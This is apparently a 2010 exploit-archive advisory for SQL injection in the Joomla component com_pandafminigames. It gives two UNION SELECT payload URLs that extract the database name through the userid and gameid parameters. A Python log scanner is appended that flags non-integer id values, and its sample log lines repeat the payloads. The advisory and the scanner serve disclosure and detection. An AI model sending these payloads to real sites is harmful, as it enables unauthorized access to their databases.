# Exploit Title: Joomla Component com_pandafminigames SQL Injection Vulnerabilities
# Date: 16.04.2010
# Author: Valentin
# Category: webapps/0day
# Version: unknown
# Tested on:
# CVE :
# Code :

[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
|:: >> General Information
|:: Advisory/Exploit Title = Joomla Component com_pandafminigames SQL Injection Vulnerabilities
|:: By = Valentin Hoebel
|:: Contact = valentin@xenuser.org
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
|:: >> Product information
|:: Name = com_pandafminigames
|:: Affected Version(s) = unknown
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
|:: >> #1 Vulnerability
|:: Type = multiple SQL Injection vulnerabilities
|:: Example URL #1 = index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=XX+AND+1=2+UNION+SELECT+concat(database()),2,concat(database()),4,5,6,7,8,9,10,11,12--
|:: Example URL #2 = index.php?option=com_pandafminigames&Itemid=XX&gameid=X+AND+1=2+UNION+SELECT+concat(database()),concat(database()),concat(database()),concat(database()),concat(database()),concat(database()),7,8--
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
|:: >> Additional Information
|:: Advisory/Exploit Published = 16.04.2010
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
|:: >> Misc
|:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
|::
|::
[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]
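
Added example (not part of the original advisory, and not the component's own code): a web-server log check that flags requests to com_pandafminigames whose userid, gameid or Itemid value is not a plain integer, which is the pattern both example URLs above share. The log lines and IP addresses are constructed, and treating these three parameters as numeric ids is an assumption.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the advisory's example URLs use; treating them as numeric ids is an assumption.
NUMERIC_PARAMS = ("userid", "gameid", "Itemid")
SQL_TOKENS = re.compile(r"\b(union|select|concat|database)\b|--", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Apr/2010:10:00:01 +0000] "GET /index.php?option=com_pandafminigames&Itemid=5&task=myscores&userid=62 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [16/Apr/2010:10:00:07 +0000] "GET /index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=62+AND+1=2+UNION+SELECT+concat(database()),2-- HTTP/1.1" 200 4873',
    '192.0.2.44 - - [16/Apr/2010:10:00:09 +0000] "GET /index.php?option=com_pandafminigames&Itemid=5&gameid=3%20AND%201%3D2%20UNION%20SELECT%201,2-- HTTP/1.1" 200 4790',
    '192.0.2.10 - - [16/Apr/2010:10:00:12 +0000] "GET /index.php?option=com_content&id=7abc HTTP/1.1" 200 900',
]


def check_request(target):
    """Return (param, decoded_value, reason) findings for one request target."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_pandafminigames" not in query.get("option", []):
        return []  # other components are out of scope for this check
    findings = []
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):
            if value == "" or re.fullmatch(r"[0-9]+", value):
                continue  # empty or plain integer: expected shape
            reason = "sql-tokens" if SQL_TOKENS.search(value) else "non-numeric"
            findings.append((name, value, reason))
    return findings


def scan_log(lines):
    """Return [(line_number, findings)] for log lines with at least one finding."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        findings = check_request(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits


if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print(number, findings)
```

Matching on "not an integer" rather than on SQL keywords alone also catches encoded or obfuscated variants, since parse_qs decodes both + and %20 before the check runs.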